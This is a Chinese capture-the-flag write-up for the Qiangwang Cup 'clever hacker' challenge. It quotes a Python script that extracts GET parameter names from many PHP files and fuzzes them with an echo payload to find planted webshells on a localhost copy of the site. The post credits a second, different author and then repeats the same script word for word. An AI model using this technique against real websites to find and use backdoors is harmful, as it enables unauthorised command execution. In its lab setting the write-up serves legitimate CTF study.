强网杯高明的黑客

这个题提示了有源码，但是好多啊，而且里面的一些参数太乱了，而且提示了网站已经被黑了，源码里面肯定是有马的，要写脚本fuzz一下....

贴一个飘零师傅的脚本

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']

def extracts(f):
    gets = []
    with open(base_dir + f, 'r') as f:
        lines = f.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:

            if line.find("$_GET['") > 0:
                start_pos = line.find("$_GET['") + len("$_GET['")
                end_pos = line.find("'", start_pos)                
                gets.append(line[start_pos:end_pos])

    return gets

def exp(start,end):
    for i in range(start,end):
        filename = file_list[i]
        gets = extracts(filename)
        print "try: %s"%filename 
        for get in gets:
            now_url = "%s%s?%s=%s"%(base_url,filename,get,'echo "sky cool";')
            r = requests.get(now_url)
            if 'sky cool' in r.content:
                print now_url
                break
    print "%s~%s not found!"%(start,end)


def main():
    pool = Pool(processes=15)    # set the processes max number 3
    for i in range(0,len(file_list),len(file_list)/15):
        pool.apply_async(exp,(i,i+len(file_list)/15,))
    pool.close()
    pool.join()

 
if __name__ == "__main__":
    main()

再贴一个Glzjin师傅的

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = ['zzt4yxY_RMa.php',........ 'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']

def extracts(f):
    gets = []
    with open(base_dir + f, 'r') as f:
        lines = f.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:

            if line.find("$_GET['") > 0:
                start_pos = line.find("$_GET['") + len("$_GET['")
                end_pos = line.find("'", start_pos)                
                gets.append(line[start_pos:end_pos])

    return gets

def exp(start,end):
    for i in range(start,end):
        filename = file_list[i]
        gets = extracts(filename)
        print "try: %s"%filename 
        for get in gets:
            now_url = "%s%s?%s=%s"%(base_url,filename,get,'echo "sky cool";')
            r = requests.get(now_url)
            if 'sky cool' in r.content:
                print now_url
                break
    print "%s~%s not found!"%(start,end)


def main():
    pool = Pool(processes=15)    # set the processes max number 3
    for i in range(0,len(file_list),len(file_list)/15):
        pool.apply_async(exp,(i,i+len(file_list)/15,))
    pool.close()
    pool.join()

 
if __name__ == "__main__":
    main()

脚本等下自己写一个锻炼锻炼........

说到这，这个需要php开启内置的web server ：：：：： php -S loaclhost:port -t 自定义目录

https://www.php.net/manual/zh/features.commandline.webserver.php

强网杯 高明的黑客

强网杯高明的黑客